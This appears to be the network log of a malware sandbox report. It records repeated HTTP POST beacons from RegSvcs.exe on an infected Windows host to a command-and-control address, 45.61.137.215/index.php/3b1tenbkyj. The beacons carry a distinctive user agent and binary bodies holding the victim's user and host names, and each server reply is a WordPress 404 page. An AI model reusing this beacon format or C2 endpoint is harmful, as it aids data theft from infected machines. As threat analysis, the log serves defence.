                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:15.186517000 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:17.705295086 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:15 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:17.705359936 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:17.705409050 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:17.705461025 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:45:17.705497980 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:45:17.705529928 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:45:17.705562115 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:17.705595016 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:45:17.705627918 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:45:17.705905914 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            72192.168.2.94978745.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:17.857075930 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:17.862200022 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:20.476535082 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:18 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:20.476542950 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:45:20.476608992 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:45:20.476638079 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:45:20.476702929 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:45:20.476710081 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:45:20.476723909 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:20.476735115 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:45:20.476746082 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:45:20.476980925 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            73192.168.2.94978845.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:20.705538034 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:20.710968018 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:23.218996048 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:21 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:23.219027996 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:23.219065905 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:23.219083071 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:45:23.219115973 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:45:23.219132900 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:45:23.219166994 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                                            Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                                            May 29, 2024 15:45:23.219183922 CEST1236INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                                            Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
